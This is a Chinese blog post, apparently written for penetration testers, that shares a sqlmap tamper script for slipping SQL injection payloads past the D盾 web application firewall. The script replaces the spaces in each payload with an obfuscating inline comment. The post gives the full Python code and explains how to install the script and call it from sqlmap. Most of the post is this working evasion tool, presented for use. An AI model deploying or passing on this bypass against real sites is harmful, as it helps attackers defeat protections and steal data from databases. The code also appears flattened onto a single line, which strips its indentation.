sqlmap繞過d盾_姿勢分享——SQL注入bypass D盾
阿新 • • 發佈:2020-12-19
技術標籤:sqlmap繞過d盾
首先感謝兄弟們的支援與關注,我們的成長離不開您的陪伴
在我們做專案的途中經常會遇到各種各樣的waf,防火牆等來攔截我們的payload,這很是讓滲透測試人員頭疼,其實網上就有很多關於waf繞過原理的文章,這篇文章就是想告訴大家,當大家理解了網上關於waf繞過的文章的內容並對其原理了解後,其實把理論深化進實踐中並沒有多困難,本篇文章就是將一個簡單常規的小思路實踐了一下,便成功繞過了D盾的waf
關於sql注入的waf繞過,說白了就是通過混淆你的sql語句,讓他以另外一種方式呈現出來,以繞過waf的黑名單正則匹配,關於sql注入waf繞過的原理在這篇文章裡不再重複,我們直接來看例項,分享一種bypass D盾的方法,這裡直接貼上tamper。
話不多說,來看程式碼:
#!/usr/bin/env pythonfrom lib.core.enums import PRIORITY__priority__ = PRIORITY.LOWdef dependencies(): passdef tamper(payload, **kwargs): """ BYPASS Ddun """ retVal = payload if payload: retVal = "" quote, doublequote, firstspace = False, False, False for i in xrange(len(payload)): if not firstspace: if payload[i].isspace(): firstspace = True retVal += "/*DJSAWW%2B%26Lt%3B%2B*/" continue elif payload[i] == '\'': quote = not quote elif payload[i] == '"': doublequote = not doublequote elif payload[i] == " " and not doublequote and not quote: retVal += "/*DJSAWW%2B%26Lt%3B%2B*/" continue retVal += payload[i] return retVal
使用方法:
將以上程式碼儲存為BypassDdun.py,並放進sqlmap的\tamper目錄,在下一次使用sqlmap的時候,引數加--tamper=BypassDdun即可呼叫這個指令碼。
如果您覺得文章對您有幫助,點下關注不迷路,日常分享滲透測試騷姿勢,我們的成長離不開您的陪伴。